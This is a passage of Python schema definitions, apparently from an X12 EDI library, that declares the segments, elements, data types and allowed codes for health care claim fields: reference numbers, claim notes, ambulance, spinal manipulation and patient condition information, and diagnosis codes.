"80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Referral Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9F"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Prior Authorization", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["G1"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Payer Claim Control Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["F8"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Clinical Laboratory Improvement Amendment (CLIA) Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["X4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Repriced Claim Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9A"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Adjusted Repriced Claim Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["9C"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Investigational Device Exemption Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["LX"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Claim Identifier For Transmission Intermediaries", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["D9"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Medical Record Number", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["EA"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Demonstration Project Identifier", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["P4"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "REF", Properties( desc="Care Plan Oversight", position="1800", repeat="1", req_sit="S", syntax="R0203", ), Element( "REF01", Properties( desc="Reference Identification Qualifier", req_sit="R", data_type=("ID", "2", "3"), position=1, codes=["1J"], ), ), Element( "REF02", Properties( desc="Reference Identification", req_sit="R", data_type=("AN", "1", "50"), position=2, codes=[], ), ), Element( "REF03", Properties( desc="Description", req_sit="N", data_type=("AN", "1", "80"), position=3, codes=[], ), ), Composite( "C040", Properties( desc="Reference Identifier", refdes="", repeat="", req_sit="N", seq="04" ), ), ), Segment( "K3", Properties( desc="File Information", position="1850", repeat="10", req_sit="S", syntax="", ), Element( "K301", Properties( desc="Fixed Format Information", req_sit="R", data_type=("AN", "1", "80"), position=1, codes=[], ), ), Element( "K302", Properties( desc="Record Format Code", req_sit="N", data_type=("ID", "1", "2"), position=2, codes=[], ), ), Composite( "C001", Properties( desc="Composite Unit of Measure", refdes="", repeat="", req_sit="N", seq="03", ), ), ), Segment( "NTE", Properties( desc="Claim Note", position="1900", repeat="1", req_sit="S", syntax="" ), Element( "NTE01", Properties( desc="Note Reference Code", req_sit="R", data_type=("ID", "3", "3"), position=1, codes=["ADD", "CER", "DCP", "DGN", "TPO"], ), ), Element( "NTE02", Properties( desc="Description", req_sit="R", data_type=("AN", "1", "80"), position=2, codes=[], ), ), ), Segment( "CR1", Properties( desc="Ambulance Transport Information", position="1950", repeat="1", req_sit="S", syntax="P0102 P0506", ), Element( "CR101", Properties( desc="Unit or Basis for Measurement Code", req_sit="S", data_type=("ID", "2", "2"), position=1, codes=["LB"], ), ), Element( "CR102", Properties( desc="Weight", req_sit="S", data_type=("R", "1", "10"), position=2, codes=[], ), ), Element( "CR103", Properties( desc="Ambulance Transport Code", req_sit="N", data_type=("ID", "1", "1"), position=3, codes=[], ), ), Element( "CR104", Properties( desc="Ambulance Transport Reason Code", req_sit="R", data_type=("ID", "1", "1"), position=4, codes=["A", "B", "C", "D", "E"], ), ), Element( "CR105", Properties( desc="Unit or Basis for Measurement Code", req_sit="R", data_type=("ID", "2", "2"), position=5, codes=["DH"], ), ), Element( "CR106", Properties( desc="Quantity", req_sit="R", data_type=("R", "1", "15"), position=6, codes=[], ), ), Element( "CR107", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=7, codes=[], ), ), Element( "CR108", Properties( desc="Address Information", req_sit="N", data_type=("AN", "1", "55"), position=8, codes=[], ), ), Element( "CR109", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=9, codes=[], ), ), Element( "CR110", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=10, codes=[], ), ), ), Segment( "CR2", Properties( desc="Spinal Manipulation Service Information", position="2000", repeat="1", req_sit="S", syntax="P0102 C0403 P0506", ), Element( "CR201", Properties( desc="Count", req_sit="N", data_type=("N0", "1", "9"), position=1, codes=[], ), ), Element( "CR202", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=2, codes=[], ), ), Element( "CR203", Properties( desc="Subluxation Level Code", req_sit="N", data_type=("ID", "2", "3"), position=3, codes=[], ), ), Element( "CR204", Properties( desc="Subluxation Level Code", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CR205", Properties( desc="Unit or Basis for Measurement Code", req_sit="N", data_type=("ID", "2", "2"), position=5, codes=[], ), ), Element( "CR206", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=6, codes=[], ), ), Element( "CR207", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=7, codes=[], ), ), Element( "CR208", Properties( desc="Nature of Condition Code", req_sit="R", data_type=("ID", "1", "1"), position=8, codes=["A", "C", "D", "E", "F", "G", "M"], ), ), Element( "CR209", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=9, codes=[], ), ), Element( "CR210", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=10, codes=[], ), ), Element( "CR211", Properties( desc="Description", req_sit="S", data_type=("AN", "1", "80"), position=11, codes=[], ), ), Element( "CR212", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=12, codes=[], ), ), ), Segment( "CRC", Properties( desc="Ambulance Certification", position="2200", repeat="3", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["07"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=6, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=7, codes=["01", "04", "05", "06", "07", "08", "09", "12"], ), ), ), Segment( "CRC", Properties( desc="Patient Condition Information: Vision", position="2200", repeat="3", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["E1", "E2", "E3"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=6, codes=["L1", "L2", "L3", "L4", "L5"], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=7, codes=["L1", "L2", "L3", "L4", "L5"], ), ), ), Segment( "CRC", Properties( desc="Homebound Indicator", position="2200", repeat="1", req_sit="S", syntax="", ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["75"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["IH"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=4, codes=[], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=5, codes=[], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=[], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), ), Segment( "CRC", Properties( desc="EPSDT Referral", position="2200", repeat="1", req_sit="S", syntax="" ), Element( "CRC01", Properties( desc="Code Category", req_sit="R", data_type=("ID", "2", "2"), position=1, codes=["ZZ"], ), ), Element( "CRC02", Properties( desc="Yes/No Condition or Response Code", req_sit="R", data_type=("ID", "1", "1"), position=2, codes=["N", "Y"], ), ), Element( "CRC03", Properties( desc="Condition Indicator", req_sit="R", data_type=("ID", "2", "3"), position=3, codes=["AV", "NU", "S2", "ST"], ), ), Element( "CRC04", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=4, codes=["AV", "NU", "S2", "ST"], ), ), Element( "CRC05", Properties( desc="Condition Indicator", req_sit="S", data_type=("ID", "2", "3"), position=5, codes=["AV", "NU", "S2", "ST"], ), ), Element( "CRC06", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=6, codes=[], ), ), Element( "CRC07", Properties( desc="Condition Indicator", req_sit="N", data_type=("ID", "2", "3"), position=7, codes=[], ), ), ), Segment( "HI", Properties( desc="Health Care Diagnosis Code", position="2310", repeat="1", req_sit="R", syntax="", ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="R", seq="01", ), Element( "HI01-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABK", "BK"], ), ), Element( "HI01-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI01-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI01-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI01-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI01-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI01-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI01-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI01-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="02", ), Element( "HI02-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI02-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI02-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI02-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI02-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI02-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI02-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI02-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI02-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="03", ), Element( "HI03-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI03-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI03-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI03-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI03-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI03-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI03-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI03-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI03-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="04", ), Element( "HI04-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI04-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI04-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI04-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI04-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI04-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI04-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI04-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI04-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="05", ), Element( "HI05-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI05-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI05-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI05-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI05-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI05-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI05-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI05-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI05-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="06", ), Element( "HI06-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI06-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI06-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI06-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI06-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI06-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI06-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI06-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI06-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="07", ), Element( "HI07-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI07-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI07-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI07-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI07-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI07-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI07-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI07-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI07-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="08", ), Element( "HI08-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI08-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI08-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI08-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI08-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI08-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI08-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI08-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI08-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="09", ), Element( "HI09-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI09-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI09-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI09-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI09-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI09-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI09-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI09-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI09-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="10", ), Element( "HI10-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI10-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI10-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI10-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI10-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI10-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI10-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI10-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI10-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="11", ), Element( "HI11-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI11-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI11-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI11-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI11-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI11-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI11-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI11-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI11-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="S", seq="12", ), Element( "HI12-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["ABF", "BF"], ), ), Element( "HI12-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI12-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI12-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI12-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI12-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI12-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI12-08", Properties( desc="Industry Code", req_sit="N", data_type=("AN", "1", "30"), position=7, codes=[], ), ), Element( "HI12-09", Properties( desc="Yes/No Condition or Response Code", req_sit="N", data_type=("ID", "1", "1"), position=8, codes=[], ), ), ), ), Segment( "HI", Properties( desc="Anesthesia Related Procedure", position="2310", repeat="1", req_sit="S", syntax="", ), Composite( "C022", Properties( desc="Health Care Code Information", refdes="", repeat="", req_sit="R", seq="01", ), Element( "HI01-01", Properties( desc="Code List Qualifier Code", req_sit="R", data_type=("ID", "1", "3"), position=0, codes=["BP"], ), ), Element( "HI01-02", Properties( desc="Industry Code", req_sit="R", data_type=("AN", "1", "30"), position=1, codes=[], ), ), Element( "HI01-03", Properties( desc="Date Time Period Format Qualifier", req_sit="N", data_type=("ID", "2", "3"), position=2, codes=[], ), ), Element( "HI01-04", Properties( desc="Date Time Period", req_sit="N", data_type=("AN", "1", "35"), position=3, codes=[], ), ), Element( "HI01-05", Properties( desc="Monetary Amount", req_sit="N", data_type=("R", "1", "18"), position=4, codes=[], ), ), Element( "HI01-06", Properties( desc="Quantity", req_sit="N", data_type=("R", "1", "15"), position=5, codes=[], ), ), Element( "HI01-07", Properties( desc="Version Identifier", req_sit="N", data_type=("AN", "1", "30"), position=6, codes=[], ), ), Element( "HI01-08", Properties( 